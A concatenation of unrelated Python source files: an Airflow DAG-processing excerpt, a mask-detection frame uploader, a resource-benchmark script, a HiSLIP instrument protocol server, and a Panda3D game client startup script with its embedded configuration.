:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.get_dag(request.dag_id), session=session)
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception:
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(run_id=request.run_id, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
if request.is_failure_callback:
ti = TI(task, run_id=simple_ti.run_id)
# TODO: Use simple_ti to improve performance here in the future
ti.refresh_from_db()
ti.handle_failure_with_callback(error=request.msg, test_mode=self.UNIT_TEST_MODE)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Mark any DAGs which are no longer present as inactive
6. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
self._deactivate_missing_dags(session, dagbag, file_path)
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
def _deactivate_missing_dags(self, session: Session, dagbag: DagBag, file_path: str) -> None:
deactivated = (
session.query(DagModel)
.filter(DagModel.fileloc == file_path, DagModel.is_active, ~DagModel.dag_id.in_(dagbag.dag_ids))
.update({DagModel.is_active: False}, synchronize_session="fetch")
)
if deactivated:
self.log.info("Deactivated %i DAGs which are no longer present in %s", deactivated, file_path)
|
send_policy.py
|
from threading import Thread
from time import sleep, time
#import face_recognition
import requests
#import numpy as np
import yaml
import os
class SendPolicy:
def __init__(self) -> None:
"""
Initialize SendPolicy module, establishing some vars.
"""
self.ready = True
with open(f'config{os.sep}config_insp.yaml', 'r') as f:
self.vars = yaml.load(f)
self.URL = self.vars['url_api']
self.time = self.vars['delay']
self.request_info = {
'ts': self.get_now(),
'location': self.vars['location']
}
self.upload_info = {
'file_uploaded': None
}
self.past_req = {}
def get_now(self) -> int:
"""
Returns current floor time.
Returns:
int: timestamp current time.
"""
# With timezone GMT-3
return int(time())-10800
def send(self, frame_in_bytes: bytes) -> None:
"""
Start processing of send packet to API, verifying if is possible
given the delay value.
Args:
frame_in_bytes (bytes): bytes to send as a file.
"""
if self.ready:
self.ready = False
exe = Thread(target=self.send2api, args=(frame_in_bytes,))
exe.start()
def send2api(self, frame_in_bytes: bytes = None) -> None:
"""
Sends data to API. If not wearing mask, sends frame also.
Args:
frame_in_bytes (bytes): Default to None. Bytes to send as a file.
"""
# get current time
self.request_info['ts'] = self.get_now()
# build file structure
if frame_in_bytes:
self.upload_info['file_uploaded'] = (
'gotcha_frame.jpg',
frame_in_bytes
)
else:
self.upload_info['file_uploaded'] = None
# verify duplicated request
if self.past_req != [frame_in_bytes,self.request_info['ts']]:
# send req. / receive response to API
response = requests.post(
self.URL,
data=self.request_info,
files=self.upload_info
)
self.past_req = [
frame_in_bytes,
self.request_info['ts']
]
# print status
print(response.status_code, response.json(), sep=' -|- ')
# give a break of request! hehe
self.wait_until_ready(self.time)
def wait_until_ready(self, time2wait):
"""
Sleeps for <time2wait> seconds
Args:
time2wait (int): Seconds to wait
"""
sleep(time2wait)
self.ready = True
|
Test_time_RAM_CPU.py
|
from subprocess import call
from Select_15_min import process_stop
import threading
import psutil
import os
import time
import csv
def llamada(programa,parametros):
i = 0
params = ""
while (i<len(parametros)):
params = params + parametros[i] + " "
return_code = call([programa, params])
return return_code
def memory_usage_psutil():
process = psutil.Process(os.getpid())
mem = process.memory_info().rss / float(2 ** 20) # return the memory usage in MB
memory = psutil.virtual_memory()
cpu = psutil.cpu_percent()
return mem,memory,cpu
def date_last_modify(path):
date = os.path.getmtime(path)
return date
algorithm = "Minsait"
iters = 10
log = "logs_time_RAM_CPU.csv"
""" Ejecucion Select_15_min.py """
duerme = 360 # segundos
entrada = "Datos_Manual_Febrero19.csv"
input = "C:\\OrquestadorTT\\NORTE\\Algoritmos\\dataanalytics.predictive\\data\\TT_NL.csv"
resultados = "C:\\OrquestadorTT\\NORTE\\Algoritmos\\dataanalytics.predictive\\output\\results.csv"
t1 = threading.Thread(target=process_stop, args=(entrada, input, duerme, iters))
""" Ejecucion MULTIALGORITMO """
programa = "python C:\\OrquestadorTT\\NORTE\\Algoritmos\\dataanalytics.predictive\\src\\main.py"
args = "-c C:\\OrquestadorTT\\NORTE\\Algoritmos\\dataanalytics.predictive\\configuration.yaml"
parametros = [args]
line_comand = programa + " " + args
t2 = threading.Thread(target=os.system, args=(line_comand,))
t1.start() # Select_15_min se inicia
# os.system(line_comand) # Llamamos al programa de predicciones
t2.start() # Llamamos al programa de predicciones
time.sleep(3)
date1_out = date_last_modify(resultados)
date1_in = date_last_modify(input)
date2_out = date1_out
date2_in = date1_in
i = 1
print ("ANNNTES DE ABRIR")
with open(log,"a",newline='') as f:
print("DESPUES DE ABRIR")
while (i<=iters):
print("Iteración número:", i)
print("Ultima modificacion del input:", time.strftime('%m/%d/%Y_%H:%M:%S', time.gmtime(date1_in)))
print("Ultima modificacion del output:", time.strftime('%m/%d/%Y_%H:%M:%S', time.gmtime(date1_out)))
init = time.clock()
date = time.strftime("%d:%m:%y_%H:%M:%S")
RAM, memory, CPU = memory_usage_psutil()
while (date1_out==date2_out): # Espera a tener una nueva prediccion
time.sleep(1)
date2_out = date_last_modify(resultados)
print("Nueva modificacion del output:", time.strftime('%m/%d/%Y_%H:%M:%S', time.gmtime(date2_out)))
end = time.clock()
time_elapsed = (end - init)
line = {'ALGORITHM':str(algorithm), 'RAM':str(RAM), 'CPU':str(CPU), 'ITER':(str(i)+"/"+str(iters)), 'TIME':str(time_elapsed), 'DATE':str(date)}
# line_ = {'ALGORITHM':"Min22",'RAM':"32",'CPU':"33",'ITERS':"1",'TIME':"324",'DATE':str(date)}
fieldnames = ['ALGORITHM', 'RAM', 'CPU', 'ITER', 'TIME', 'DATE']
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writerow(line)
while ((date1_in==date2_in)&(i<iters)): # Espera a tener un nuevo input
time.sleep(1)
date2_in = date_last_modify(input)
print("Nueva modificacion del input:", time.strftime('%m/%d/%Y_%H:%M:%S', time.gmtime(date2_in)))
date1_out = date2_out
date1_in = date2_in
i = i+1
f.close()
t1.join()
t2.join()
|
hislip_server.py
|
# -*- coding: utf-8 -*-
"""
@author: Lukas Sandström
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import struct
import threading
from cStringIO import StringIO
from pprint import pprint
import socket
try:
import SocketServer as socketserver
except ImportError:
import socketserver
from collections import namedtuple
from aenum import IntEnum
logger = logging.getLogger(__name__)
class HislipError(Exception):
pass
class HislipProtocolError(HislipError):
"""Something went wrong on the wire"""
pass
class HislipConnectionClosed(HislipError):
pass
def repack(from_, to, *args):
"""
Repacks data from one unpacked state to another.
`struct.unpack(to, struct.pack(from_, *args))`
:param from_: The struct which the *args will be packed into
:param to: The target struct
:param args: positional arguments
:return: a tuple
"""
return struct.unpack(to, struct.pack(from_, *args))
class Message(object):
_type_check = None # Used to check for the correct type in unpack when subclassing
_subclasses = dict() # Holds a reference for all defined subclasses msg_id => class
@classmethod
def message(cls, type_):
"""
Decorator for subclasses
"""
def x(subclass):
subclass._type_check = type_
cls._subclasses[type_] = subclass
return subclass
return x
class Type(IntEnum):
Initialize = 0
InitializeResponse = 1
FatalError = 2
Error = 3
AsyncLock = 4
AsyncLockResponse = 5
Data = 6
DataEnd = 7
DeviceClearComplete = 8
DeviceClearAcknowledge = 9
AsyncRemoteLocalControl = 10
AsyncRemoteLocalResponse = 11
Trigger = 12
Interrupted = 13
AsyncInterrupted = 14
AsyncMaximumMessageSize = 15
AsyncMaximumMessageSizeResponse = 16
AsyncInitialize = 17
AsyncInitializeResponse = 18
AsyncDeviceClear = 19
AsyncServiceRequest = 20
AsyncStatusQuery = 21
AsyncStatusResponse = 22
AsyncDeviceClearAcknowledge = 23
AsyncLockInfo = 24
AsyncLockInfoResponse = 25
prologue = b"HS"
def __init__(self):
self.type = self._type_check
self.ctrl_code = 0
self.param = 0
self.payload = b""
@classmethod
def _copy(cls, msg):
new = cls()
new.type = msg.type
new.ctrl_code = msg.ctrl_code
new.param = msg.param
new.payload = msg.payload
return new
def __str__(self):
return "%s <%r> <%r> <%r> <%i> : <%r>" % \
(self.prologue, self.type, self.ctrl_code, self.param, self.payload_len, self.payload[:50])
@classmethod
def parse(cls, fd):
"""
A Message factory function, which reads a complete message from fd and returns an instance
of the correct subclass, or Message() if there is no subclass available.
:param fd: object implementing read()
:return: A Message instance
"""
tmp = cls()
tmp.unpack(fd)
if tmp.type not in cls._subclasses:
return tmp
return cls._subclasses[tmp.type]._copy(tmp)
@property
def payload_len(self):
return len(self.payload)
_struct_hdr = struct.Struct("!2sBBIQ")
_msg_tuple = namedtuple("HiSLIP_message", ["prologue", "type", "ctrl_code", "param", "payload_len"])
def pack(self):
assert self.type is not None
try:
hdr = self._struct_hdr.pack(self.prologue, self.type, self.ctrl_code, self.param, self.payload_len)
except Exception as e:
logger.exception("struct.pack() failed.")
raise
return hdr + self.payload
def unpack(self, fd):
try:
data = fd.read(self._struct_hdr.size)
except socket.error as e:
raise HislipConnectionClosed(e.message)
if not len(data):
raise HislipConnectionClosed("Short read. Connection closed.")
msg = self._msg_tuple._make(self._struct_hdr.unpack_from(data))
if msg.prologue != self.prologue:
raise HislipProtocolError("Invalid message prologue")
try:
self.type = self.Type(msg.type)
except ValueError:
raise HislipProtocolError("Unknown message type (%i)" % msg.type)
if self._type_check and self._type_check != self.type:
raise HislipError("Unexpected message type (%i)" % self.type)
self.ctrl_code = msg.ctrl_code
self.param = msg.param
self.payload = fd.read(msg.payload_len)
if msg.payload_len != len(self.payload):
raise HislipProtocolError("Invalid payload length, %i (header) != %i (actual)" %
(msg.payload_len, len(self.payload)))
@Message.message(Message.Type.Initialize)
class MessageInitialize(Message):
client_protocol_version = 0
client_vendor_id = "ZZ"
@property
def sub_address(self):
return str(self.payload)
@sub_address.setter
def sub_address(self, x):
self.payload = str(x)
@property
def param(self):
return repack("!H2s", "!I", self.client_protocol_version, self.client_vendor_id)[0]
@param.setter
def param(self, x):
self.client_protocol_version, self.client_vendor_id = repack("!I", "!H2s", x)
@Message.message(Message.Type.InitializeResponse)
class MessageInitializeResponse(Message):
server_protocol_version = struct.pack("!BB", 1, 0)
session_id = None
@property
def overlap_mode(self):
return self.ctrl_code & 1
@overlap_mode.setter
def overlap_mode(self, x):
if x:
self.ctrl_code = 1
else:
self.ctrl_code = 0
@property
def param(self):
return repack("!HH", "!I", self.server_protocol_version, self.session_id)[0]
@param.setter
def param(self, x):
self.server_protocol_version, self.session_id = repack("!I", "!HH", x)
@Message.message(Message.Type.AsyncInitialize)
class MessageAsyncInitialize(Message):
@property
def session_id(self):
return self.param
@session_id.setter
def session_id(self, x):
self.param = int(x)
@Message.message(Message.Type.AsyncInitializeResponse)
class MessageAsyncInitializeResponse(Message):
@property
def server_vendor_id(self):
return repack("!I", "!xx2s", self.param)[0]
@server_vendor_id.setter
def server_vendor_id(self, x):
assert len(str(x)) == 2
self.param = repack("!xx2s", "!I", str(x))[0]
@Message.message(Message.Type.AsyncMaximumMessageSize)
class MessageAsyncMaximumMessageSize(Message):
@property
def max_size(self):
assert self.payload_len == 8
return struct.unpack("!Q", self.payload)
@max_size.setter
def max_size(self, x):
self.payload = struct.pack("!Q", x)
@Message.message(Message.Type.AsyncMaximumMessageSizeResponse)
class MessageAsyncMaximumMessageSizeResponse(MessageAsyncMaximumMessageSize):
pass
@Message.message(Message.Type.AsyncLock)
class MessageAsyncLock(Message):
@property
def request(self):
return self.ctrl_code & 1
@property
def release(self):
return not self.ctrl_code & 1
@property
def timeout(self):
assert self.request # The timeout parameter is only sent when requesting the lock
return self.param
@Message.message(Message.Type.AsyncLockResponse)
class MessageAsyncLockResponse(Message):
pass
@Message.message(Message.Type.AsyncLockInfoResponse)
class MessageAsyncLockInfoResponse(Message):
@property
def exclusive_lock_granted(self):
return self.ctrl_code & 1
@exclusive_lock_granted.setter
def exclusive_lock_granted(self, x):
if x:
self.ctrl_code = 1
else:
self.ctrl_code = 0
@property
def lock_count(self):
return self.param
@lock_count.setter
def lock_count(self, x):
self.param = int(x)
@Message.message(Message.Type.Data)
class MessageData(Message):
@property
def RMT(self):
return self.ctrl_code & 1
@RMT.setter
def RMT(self, x):
if x:
self.ctrl_code = 1
else:
self.ctrl_code = 0
@property
def message_id(self):
return self.param
@message_id.setter
def message_id(self, x):
self.param = int(x)
@Message.message(Message.Type.AsyncStatusQuery)
class MessageAsyncStatusQuery(MessageData):
pass
@Message.message(Message.Type.AsyncStatusResponse)
class MessageAsyncStatusResponse(MessageData):
@property
def status(self):
return self.ctrl_code
@status.setter
def status(self, x):
self.ctrl_code = x
@Message.message(Message.Type.DataEnd)
class MessageDataEnd(MessageData):
pass
@Message.message(Message.Type.AsyncDeviceClearAcknowledge)
class MessageAsyncDeviceClearAcknowledge(Message):
@property
def overlap_mode(self):
return self.ctrl_code & 1
@overlap_mode.setter
def overlap_mode(self, x):
if x:
self.ctrl_code = 1
else:
self.ctrl_code = 0
@Message.message(Message.Type.DeviceClearComplete)
class MessageDeviceClearComplete(MessageAsyncDeviceClearAcknowledge):
pass
@Message.message(Message.Type.DeviceClearAcknowledge)
class MessageDeviceClearAcknowledge(MessageAsyncDeviceClearAcknowledge):
pass
@Message.message(Message.Type.Trigger)
class MessageTrigger(MessageData):
pass
class HislipClient(object):
def __init__(self):
self.instr_sub_addr = None
self.overlap_mode = None
self.session_id = None
#private
self.lock = threading.RLock()
self.sync_handler = None
self.async_handler = None
self.max_message_size = None
self.sync_buffer = StringIO()
self.message_id = 0xffffff00
self.MAV = False # Message available for client. See HiSLIP 4.14.1
self.RMT_expected = False
def get_stb(self):
if self.MAV:
return 0x10
return 0x00
class HislipHandler(socketserver.StreamRequestHandler, object):
class _MsgHandler(dict):
def __call__(self, msg_type): # Decorator for registering handler methods
def x(func):
self[msg_type] = func
return func
return x
msg_handler = _MsgHandler()
def __init__(self, request, client_address, server):
"""
:param socket.Socket request:
:param client_address:
:param HislipServer server:
"""
socketserver.BaseRequestHandler.__init__(self, request, client_address, server)
self.server = server
self.client = None
self.sync_conn = None
self.session_id = None
def send_msg(self, message):
logger.debug(" resp: %s", message)
if message.type == Message.Type.Data or message.type == Message.Type.DataEnd:
with self.client.lock: # HiSLIP 4.14.1
self.client.MAV = True
self.wfile.write(message.pack())
def init_connection(self):
init = Message.parse(self.rfile)
if init.type == Message.Type.Initialize:
self.sync_init(init)
elif init.type == Message.Type.AsyncInitialize:
self.async_init(init)
else:
raise HislipProtocolError("Unexpected message at connection init, %r" % init)
def sync_init(self, msg):
"""
:param MessageInitialize msg:
"""
# Send message to subclass
# check protocol version
with self.server.client_lock:
self.client, session_id = self.server.new_client(), self.server.new_session_id()
with self.client.lock:
self.client.session_id = session_id
self.client.sync_handler = self
self.client.instr_sub_addr = msg.payload
self.sync_conn = True
logger.info("Connection from %r to %s", self.client_address, msg.payload)
error = self.server.connection_request(self.client)
if error is not None:
self.send_msg(error)
self.server.client_disconnect(self.client)
raise error
response = MessageInitializeResponse()
response.overlap_mode = self.server.overlap_mode
response.session_id = self.session_id
self.send_msg(response)
# Setup of sync channel complete, wait for connection of async channel
def async_init(self, msg):
"""
:param MessageAsyncInitialize msg:
"""
self.session_id = msg.session_id
try:
self.client = self.server.get_client(msg.session_id)
except KeyError:
raise HislipProtocolError("AsyncInitialize with unknown session id.")
with self.client.lock:
if self.client.async_handler is not None:
raise HislipProtocolError("AsyncInitialize with already initialized session.")
self.client.async_handler = self
self.sync_conn = False
response = MessageAsyncInitializeResponse()
response.server_vendor_id = self.server.vendor_id
self.send_msg(response)
@msg_handler(Message.Type.AsyncDeviceClear)
def async_device_clear(self, msg): # HiSLIP 4.12
# FIXME: stub
response = MessageAsyncDeviceClearAcknowledge()
response.overlap_mode = self.server.overlap_mode
self.send_msg(response)
@msg_handler(Message.Type.DeviceClearComplete)
def device_clear(self, msg): # HiSLIP 4.12
# FIXME: stub
overlap = msg.overlap_mode
response = MessageDeviceClearAcknowledge()
response.overlap_mode = self.server.overlap_mode
self.send_msg(response)
@msg_handler(Message.Type.AsyncLock)
def async_lock(self, msg):
# FIXME: stub
response = MessageAsyncLockResponse()
response.ctrl_code = 1
self.send_msg(response)
@msg_handler(Message.Type.AsyncLockInfo)
def async_lock_info(self, msg):
# FIXME: locking stub
response = MessageAsyncLockInfoResponse()
response.exclusive_lock_granted = True
response.lock_count = 1
self.send_msg(response)
@msg_handler(Message.Type.AsyncStatusQuery)
def async_status_query(self, msg):
response = MessageAsyncStatusResponse()
with self.client.lock:
if msg.RMT:
self.client.MAV = False
response.status = self.client.get_stb()
self.send_msg(response)
@msg_handler(Message.Type.AsyncMaximumMessageSize)
def max_size_message(self, msg):
"""
:param MessageAsyncMaximumMessageSize msg:
"""
with self.client.lock:
self.client.max_message_size = msg.max_size
response = MessageAsyncMaximumMessageSizeResponse()
response.max_size = int(self.server.max_message_size)
self.send_msg(response)
@msg_handler(Message.Type.Data)
def sync_data(self, msg):
"""
:param MessageData msg:
"""
with self.client.lock:
if msg.RMT:
self.client.MAV = False
self.client.sync_buffer.write(msg.payload)
@msg_handler(Message.Type.DataEnd)
def sync_data_end(self, msg):
with self.client.lock:
if msg.RMT:
self.client.MAV = False
self.client.sync_buffer.write(msg.payload)
self.client.message_id = msg.message_id
self.client.sync_buffer.seek(0)
data = self.client.sync_buffer.read()
logger.debug("DataEnd: %r" % data)
if len(data) > 2 and data[-2] == "?":
response = MessageDataEnd()
response.message_id = self.client.message_id
response.payload = b"RS,123,456,798\n"
self.send_msg(response)
# FIXME: pass data to application
self.client.sync_buffer = StringIO() # Clear the buffer
@msg_handler(Message.Type.Trigger)
def trigger(self, msg):
with self.client.lock:
self.client.message_id = msg.message_id
if msg.RMT:
self.client.MAV = False
def handle(self):
self.init_connection()
if self.sync_conn:
prf = " sync: %s"
else:
prf = "async: %s"
while True:
try:
msg = Message.parse(self.rfile)
except HislipConnectionClosed as e:
logger.info("Connection closed, %r", self.client_address)
self.server.client_disconnect(self.client)
break
logger.debug(prf, str(msg))
if msg.type in self.msg_handler:
self.msg_handler[msg.type](self, msg)
else:
logger.warning("No handler for this message")
class HislipServer(socketserver.ThreadingTCPServer, object):
def __init__(self, *args, **kwargs):
super(HislipServer, self).__init__(*args, **kwargs)
self.vendor_id = b"\x52\x53" # R & S
self.max_message_size = 500e6
self.overlap_mode = False
self.allow_reuse_address = True
self.client_lock = threading.RLock()
self.clients = dict() # session id => Client()
self._last_session_id = 0
def read_stb(self):
# Override this in a subclass
return 0
def new_session_id(self):
self._last_session_id += 1
return self._last_session_id
def new_client(self):
return HislipClient()
def get_client(self, session_id):
"""
:param session_id:
:rtype: HislipClient
"""
with self.client_lock:
return self.clients[session_id]
def connection_request(self, client):
"""
This method can be used to reject incomming connections by returning a MessageFatalError
:param HislipClient client:
:return: None or MessageFatalError
"""
with self.client_lock:
self.clients[client.session_id] = client
def client_disconnect(self, client):
with self.client_lock:
try:
client = self.clients.pop(client.session_id)
except KeyError:
return
with client.lock:
try:
if client.sync_handler is not None:
client.sync_handler.request.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
try:
if client.async_handler is not None:
client.async_handler.request.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
def _main():
import sys
logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
hislip_server = HislipServer(("localhost", 4880), HislipHandler)
server_thread = threading.Thread(target=hislip_server.serve_forever)
server_thread.daemon = True
server_thread.start()
raw_input("Enter to end")
import stacktracer
if __name__ == "__main__":
stacktracer.trace_start("trace.html")
_main()
|
ClientStart.py
|
#!/usr/bin/env python2
import __builtin__
import os
__builtin__.process = 'client'
# Temporary hack patch:
__builtin__.__dict__.update(__import__('pandac.PandaModules', fromlist = ['*']).__dict__)
from direct.extensions_native import HTTPChannel_extensions
from direct.extensions_native import Mat3_extensions
from direct.extensions_native import VBase3_extensions
from direct.extensions_native import VBase4_extensions
from direct.extensions_native import NodePath_extensions
from panda3d.core import loadPrcFile
# if __debug__:
# loadPrcFile('config/general.prc')
# loadPrcFile('config/release/dev.prc')
# else:
# config = niraidata.CONFIG
# config = aes.decrypt(config, key, iv)
config = """# Window settings:
window-title DubitTown [BETA]
win-origin -2 -2
icon-filename phase_3/etc/icon.ico
cursor-filename phase_3/etc/toonmono.cur
show-frame-rate-meter #f
# DubitTown Engine 3.0
want-vive #f
want-android #f
want-headless #f
want-live-updates #f
want-cuda #t
loader-num-threads 25
# Debug
default-directnotify-level info
notify-level-DistributedNPCScientistAI info
notify-level-DistributedPetAI info
want-pstats #f
# Audio:
audio-library-name p3fmod_audio
# Graphics:
aux-display pandagl
aux-display pandadx9
aux-display p3tinydisplay
# Models:
model-cache-models #f
model-cache-textures #f
default-model-extension .bam
# Performance
smooth-enable-prediction 1
smooth-enable-smoothing 1
smooth-lag 0.4
smooth-max-future 1.0
smooth-min-suggest-resync 0
average-frame-rate-interval 60.0
clock-frame-rate 60.0
# Preferences:
preferences-filename preferences.json
# Backups:
backups-filepath backups/
backups-extension .json
# Server:
server-timezone EST/EDT/-5
server-port 7198
account-bridge-filename astron/databases/account-bridge.db
# Performance:
sync-video #f
texture-power-2 none
gl-check-errors #f
garbage-collect-states #f
# Egg object types:
egg-object-type-barrier <Scalar> collide-mask { 0x01 } <Collide> { Polyset descend }
egg-object-type-trigger <Scalar> collide-mask { 0x01 } <Collide> { Polyset descend intangible }
egg-object-type-sphere <Scalar> collide-mask { 0x01 } <Collide> { Sphere descend }
egg-object-type-trigger-sphere <Scalar> collide-mask { 0x01 } <Collide> { Sphere descend intangible }
egg-object-type-floor <Scalar> collide-mask { 0x02 } <Collide> { Polyset descend }
egg-object-type-dupefloor <Scalar> collide-mask { 0x02 } <Collide> { Polyset keep descend }
egg-object-type-camera-collide <Scalar> collide-mask { 0x04 } <Collide> { Polyset descend }
egg-object-type-camera-collide-sphere <Scalar> collide-mask { 0x04 } <Collide> { Sphere descend }
egg-object-type-camera-barrier <Scalar> collide-mask { 0x05 } <Collide> { Polyset descend }
egg-object-type-camera-barrier-sphere <Scalar> collide-mask { 0x05 } <Collide> { Sphere descend }
egg-object-type-model <Model> { 1 }
egg-object-type-dcs <DCS> { 1 }
# Safe zones:
want-safe-zones #t
want-toontown-central #t
want-donalds-dock #t
want-daisys-garden #t
want-minnies-melodyland #t
want-the-burrrgh #t
want-donalds-dreamland #t
want-goofy-speedway #t
want-outdoor-zone #t
want-golf-zone #t
# Weather system
want-weather #f
# Options Page
change-display-settings #t
change-display-api #t
# Safe zone settings:
want-treasure-planners #t
want-suit-planners #t
want-butterflies #f
# Classic characters:
want-classic-chars #f
want-mickey #f
want-donald-dock #f
want-daisy #f
want-minnie #f
want-pluto #f
want-donald-dreamland #f
want-chip-and-dale #f
want-goofy #f
# Trolley minigames:
want-minigames #t
want-photo-game #f
want-travel-game #f
# Picnic table board games:
want-game-tables #f
# Cog Battles
base-xp-multiplier 5.0
# Cog headquarters:
want-cog-headquarters #t
want-sellbot-headquarters #t
want-cashbot-headquarters #t
want-lawbot-headquarters #t
want-bossbot-headquarters #t
# Cashbot boss:
want-resistance-toonup #f
want-resistance-restock #f
# Cog buildings:
want-cogbuildings #t
# Optional:
show-total-population #f
want-mat-all-tailors #t
want-long-pattern-game #f
show-population #t
show-total-population #t
# Animated Props
zero-pause-mult 1.0
# Interactive Props
randomize-interactive-idles #t
interactive-prop-random-idles #t
interactive-prop-info #f
props-buff-battles #t
prop-idle-pause-time 0.0
# Events
want-charity-screen #t
# Developer options:
want-dev #f
want-pstats #f
want-directtools #f
want-tk #f
# Holidays
active-holidays 64, 65, 66 #128, 116, 63
# Temporary:
want-old-fireworks #t
# Live updates:
want-live-updates #t
# Server:
server-version TTPA-Beta-1.2.0
shard-low-pop 50
shard-mid-pop 80
# Core features:
want-pets #t
want-parties #f
want-cogdominiums #t
want-achievements #t
# Chat:
want-whitelist #t
# Cashbot boss:
want-resistance-toonup #t
want-resistance-restock #t
# Developer options:
want-dev #f
"""
production_model_path = '/'
if(os.environ.get('model-path', production_model_path) == production_model_path):
config += '\nmodel-path ' + production_model_path
else:
config += '\nmodel-path ' + os.environ.get('model-path', production_model_path)
import sys
from panda3d.core import *
import StringIO
io = StringIO.StringIO(config)
vfs = VirtualFileSystem.getGlobalPtr()
import glob
for line in io.readlines():
# check if the current line is a comment...
if line.startswith('#'):
continue
# print line
# load the prc file value
loadPrcFileData('', line)
del config
from direct.directnotify.DirectNotifyGlobal import directNotify
from otp.settings.Settings import Settings
notify = directNotify.newCategory('DubitTownClient')
notify.setInfo(True)
preferencesFilename = ConfigVariableString(
'preferences-filename', 'preferences.json').getValue()
notify.info('Reading %s...' % preferencesFilename)
__builtin__.settings = Settings(preferencesFilename)
from toontown.settings import ToontownSettings
__builtin__.ttsettings = ToontownSettings
for setting in ttsettings.DefaultSettings:
if setting not in settings:
settings[setting] = ttsettings.DefaultSettings[setting]
loadPrcFileData('Settings: res', 'win-size %d %d' % tuple(settings.get('res', (1280, 720))))
loadPrcFileData('Settings: fullscreen', 'fullscreen %s' % settings['fullscreen'])
loadPrcFileData('Settings: music', 'audio-music-active %s' % settings['music'])
loadPrcFileData('Settings: sfx', 'audio-sfx-active %s' % settings['sfx'])
loadPrcFileData('Settings: musicVol', 'audio-master-music-volume %s' % settings['musicVol'])
loadPrcFileData('Settings: sfxVol', 'audio-master-sfx-volume %s' % settings['sfxVol'])
loadPrcFileData('Settings: loadDisplay', 'load-display %s' % settings['loadDisplay'])
loadPrcFileData('Settings: toonChatSounds', 'toon-chat-sounds %s' % settings['toonChatSounds'])
loadPrcFileData('', 'texture-anisotropic-degree %d' % settings['anisotropic-filtering'])
loadPrcFileData('', 'framebuffer-multisample %s' % settings['anti-aliasing'])
loadPrcFileData('', 'sync-video %s' % settings['vertical-sync'])
vfs = VirtualFileSystem.getGlobalPtr()
DefaultPhases = (3, 3.5, 4, 5, 5.5, 6, 7, 8, 9, 10, 11, 12, 13)
import glob
notify.info("Loading Default Pack...")
for file in glob.glob('resources/default/*.mf'):
if float(file.replace('.mf', '').replace('resources/default\phase_', '')) in DefaultPhases:
mf = Multifile()
mf.openReadWrite(Filename(file))
names = mf.getSubfileNames()
vfs.mount(mf, Filename('/'), 0)
notify.info('Successfully Mounted:' + file)
notify.info("Default Pack Loaded!")
from toontown.toonbase.ContentPackManager import ContentPackManager
__builtin__.ContentPackMgr = ContentPackManager()
ContentPackMgr.loadAll()
loadDisplay = settings.get('loadDisplay', 'pandagl')
loadPrcFileData('', 'load-display %s' % settings['loadDisplay'])
import os
import time
import sys
import random
import __builtin__
try:
from toontown.launcher.TTALauncher import TTALauncher
launcher = TTALauncher()
__builtin__.launcher = launcher
except Exception as e:
raise (e)
if launcher.isDummy():
http = HTTPClient()
else:
http = launcher.http
from toontown.toonbase import ToontownGlobals
tempLoader = Loader()
from direct.gui import DirectGuiGlobals
from direct.gui.DirectGui import *
from toontown.pgui import DirectGuiGlobals as PGUIGlobals
DirectGuiGlobals.setDefaultFontFunc(ToontownGlobals.getInterfaceFont)
PGUIGlobals.setDefaultFontFunc(ToontownGlobals.getInterfaceFont)
launcher.setPandaErrorCode(7)
notify.info('Loading DubitTownBase...')
from toontown.toonbase import ToonBase
ToonBase.ToonBase()
from panda3d.core import *
if base.win is None:
notify.error('Unable to open window; aborting.')
launcher.setPandaErrorCode(0)
launcher.setPandaWindowOpen()
ConfigVariableDouble('decompressor-step-time').setValue(0.01)
